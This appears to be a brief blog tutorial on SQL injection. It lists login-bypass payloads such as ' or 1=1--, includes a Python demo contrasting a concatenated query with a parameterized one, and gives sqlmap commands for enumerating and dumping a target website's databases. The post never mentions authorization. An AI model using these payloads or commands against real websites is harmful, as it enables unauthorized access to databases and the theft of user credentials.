What is SQL Injection & How to use SQL Map
By siddhant on June 05, 2019
SQL Injection is a type of attack carried out against websites to access their sensitive data without authorization by inserting malicious content, called a payload, into the website. Through an SQL injection vulnerability, an attacker can bypass the login by entering SQL cheat codes in place of credentials, and can then access all the data of the website and the credentials of all of its users.
SQL Injection can also be used to add, modify and delete records in a database, affecting data integrity.

It can be done in two ways:
1. By using SQL cheat codes
• admin' --
• admin' #
• admin'/*
• ' or 1=1--
• ' or 1=1#
• ' or 1=1/*
• ') or '1'='1--
• ') or ('1'='1--
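
The login bypass described above works when the application builds its query by concatenating user input into the SQL text. As an added example (not code from the original post), the following Python code runs two of the listed inputs against a constructed in-memory SQLite table, first through a concatenated query and then through a parameterized one. The table, function names and password are assumptions made for the illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: one account. The password is stored in
    # plaintext only to keep the example short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_vulnerable(db, username, password):
    # User input is pasted into the SQL text, so a quote in the input
    # closes the string literal and the remainder is parsed as SQL.
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # the input produced malformed SQL

def login_safe(db, username, password):
    # Placeholders pass the values separately from the SQL text, so the
    # input is only ever compared as data and never parsed as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None

# Two of the inputs listed on this page, submitted as the username
# together with a wrong password.
PAGE_INPUTS = ["admin' --", "' or 1=1--"]

def compare():
    # Maps each input to (vulnerable login result, parameterized login result).
    db = make_db()
    return {p: (login_vulnerable(db, p, "wrong"), login_safe(db, p, "wrong"))
            for p in PAGE_INPUTS}

if __name__ == "__main__":
    for payload, (vuln, safe) in compare().items():
        print(f"{payload!r:15} concatenated={vuln} parameterized={safe}")
```

With the parameterized query, the same inputs are treated as literal usernames that do not exist, so the login fails.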
2. By using SQL Map
SQL Map (sqlmap) is a tool in Kali Linux with which we can attack a website by using commands like:
• sqlmap -u (link of the website on which you want to attack) --dbs
This command lists the databases of the website.
• sqlmap -u (link of the website on which you want to attack) -D (database name) --tables
This command lists the tables of a specific database.
• sqlmap -u (link of the website on which you want to attack) -D (database name) -T (table name) --columns
This command lists the columns of a specific table.
• sqlmap -u (link of the website on which you want to attack) -D (database name) -T (table name) -C (specific column) --dump
This command dumps the data stored in the specific column of that table.